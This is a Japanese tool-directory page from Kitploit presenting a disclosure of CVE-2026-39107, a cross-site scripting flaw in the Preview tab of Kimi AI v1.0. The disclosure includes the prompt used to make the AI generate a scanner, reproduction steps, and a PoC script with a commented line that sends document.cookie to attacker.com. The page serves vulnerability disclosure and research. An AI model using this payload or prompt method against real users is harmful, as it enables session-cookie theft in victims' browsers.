Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/mgtx2/cve-2026-39107
脆弱性分析ウェブアプリケーション悪用ウェブセキュリティ論文と研究学習と教育
GitHubmgtx2/cve-2026-39107

CVE-2026-39107

Kimi AI v1.0のPreviewタブにおける格納型XSS脆弱性の詳細な開示。攻撃シナリオ、PoC、およびセキュリティ研究者向けの是正ガイダンスを含みます。

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-39107: Kimi AI v1.0 におけるクロスサイトスクリプティング (XSS)

説明

Kimi AI v1.0 のWebインターフェースの「プレビュー」機能に、クロスサイトスクリプティング (XSS) の脆弱性が存在します。このアプリケーションは、AIモデルが生成したHTML/JavaScriptペイロードを適切にサニタイズまたはエンコードできません。ユーザーがAI生成コードを表示するために「プレビュー」タブに切り替えると、悪意のあるペイロードがDOMに直接レンダリングされ、被害者のブラウザセッションで任意のJavaScriptが実行される結果となります。

研究者

Mustafa Hameed

脆弱性の詳細

  • 脆弱性の種類: AI応答を介した保存型/保存型類似のクロスサイトスクリプティング (XSS)
  • 影響を受ける製品: Kimi AI
  • 影響を受けるバージョン: v1.0
  • 影響を受けるコンポーネント: 「プレビュー」タブ / コードレンダリングコンポーネント

攻撃シナリオと悪用方法

この脆弱性は、組み込みペイロードを含むセキュリティツールまたはスクリプト(例: XSStrike に類似した自動XSSスキャナー)を生成するようにAIにプロンプトを送ることで悪用できます。AIは要求されたアプリケーションのソースコードを生成しますが、HTML/JavaScriptフレームワーク内に悪意のあるペイロードを埋め込みます。被害者が生成されたツールをテストまたは表示するために「プレビュー」タブに移動すると、埋め込まれた悪意のあるペイロードがサニタイズを回避して即座に実行されます。

使用したプロンプト:

"XSStrikeに類似したシンプルなWebベースのXSSスキャナーツールを作成してください。スキャン用のペイロードのリストを含むインターフェースを含めてください。"

埋め込まれた悪意のあるペイロードの例:

root@kitploit:~
<script>
    alert('mustafa');
// Potential for malicious action: fetch('http://attacker.com/log?cookie=' + document.cookie)
</script>

再現手順

1.Kimi AI Webプラットフォームにログインします。

2.スキャナーコードを含むツール(XSStrikeクローンなど)の作成を要求するプロンプトを入力します。

3.AIモデルがコード応答を完全に生成するのを待ちます。

4.チャットインターフェースの「プレビュー」タブをクリックして、レンダリングされたアプリケーションを表示します。

5.アプリケーションがプレビューコンテナ内のJavaScriptコンテキストをフィルタリングできないため、被害者のブラウザでスクリプトが即座に実行されます。

概念実証 (PoC)

以下は、XSSペイロードが正常に実行されたことを示すスクリーンショットです。「プレビュー」 タブに移動すると、悪意のあるJavaScriptが即座にトリガーされます。

XSS
ツールをダウンロード